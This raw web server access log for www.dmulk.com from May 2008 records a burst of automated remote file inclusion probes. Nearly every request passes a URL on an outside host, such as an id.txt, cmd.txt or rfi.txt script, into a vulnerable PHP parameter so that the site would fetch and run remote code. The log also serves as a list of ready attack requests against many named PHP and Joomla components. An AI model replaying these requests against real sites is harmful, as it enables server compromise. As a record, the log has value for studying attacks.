89.108.67.192 - - [03/May/2008:11:10:16 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:10:16 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:10:39 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:10:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:10:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.70.204.99 - - [03/May/2008:11:10:48 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:11:02 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:11:02 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:11:03 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:11:06 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:11:06 -0700] "GET //oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:11:39 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:11:40 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:11:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:12:02 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:12:08 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:12:15 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:12:15 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:12:16 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:12:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:12:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.187 - - [03/May/2008:11:13:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:13:15 -0700] "GET /logs/access_080321.log/errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:13:16 -0700] "GET /errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:13:16 -0700] "GET /logs/errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:13:30 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:13:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:13:57 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:13:58 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:14:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:14:02 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:15:17 -0700] "GET /db.php?path_local=http://www.pmstudio.net/linho/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.215.101.21 - - [03/May/2008:11:15:33 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lupuss.us/rfi.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:15:34 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:15:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:15:58 -0700] "GET //modules/xfsection/modify.php?dir_module=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:11:16:04 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:11:16:05 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:11:16:07 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:16:08 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:16:08 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:16:31 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:16:31 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:16:36 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:16:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:17:18 -0700] "GET /logs/access_071229.log/errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:11:17:50 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:11:17:51 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:18:27 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:18:28 -0700] "GET //modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:18:28 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:18:28 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:18:29 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:18:29 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:18:30 -0700] "GET //modules/xfsection/modify.php?dir_module=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:18:30 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:11:18:39 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [03/May/2008:11:18:51 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:11:18:58 -0700] "GET /logs//port.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:11:18:58 -0700] "GET //port.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:00 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:00 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:01 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:13 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:14 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:19:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:19:58 -0700] "GET //oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:19:58 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:20:00 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:20:03 -0700] "GET //oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:11:20:09 -0700] "GET /logs//errors.php?error=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:20:12 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:20:13 -0700] "GET //ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:11:20:14 -0700] "GET //errors.php?error=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:20:45 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:20:48 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.11.108.130 - - [03/May/2008:11:21:50 -0700] "GET //ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:22:24 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:22:24 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.185 - - [03/May/2008:11:22:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.91 - - [03/May/2008:11:22:30 -0700] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:22:39 -0700] "GET /logs/access_080209.log//errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:22:40 -0700] "GET //errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:22:41 -0700] "GET /logs//errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:22:45 -0700] "GET /logs//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:22:45 -0700] "GET /logs//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:22:45 -0700] "GET //port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:22:45 -0700] "GET //port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:23:33 -0700] "GET /logs/access_080215.log//port.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:23:33 -0700] "GET //port.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:23:33 -0700] "GET /logs//port.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:23:53 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:23:53 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.17.211 - - [03/May/2008:11:24:04 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.214.17.211 - - [03/May/2008:11:24:04 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:24:24 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:24:28 -0700] "GET //modules/xfsection/modify.php?dir_module=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:24:28 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:24:30 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [03/May/2008:11:24:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:11:24:46 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:11:24:46 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:11:24:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:11:24:47 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [03/May/2008:11:24:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:25:48 -0700] "GET /logs/index.php?option=com_alphacontent§ion=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:25:52 -0700] "GET /index.php?option=com_alphacontent§ion=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:25:52 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:25:54 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:25:55 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:25:55 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [03/May/2008:11:25:57 -0700] "GET //oneadmin/config.php?path[docroot]=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:26:09 -0700] "GET /logs//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
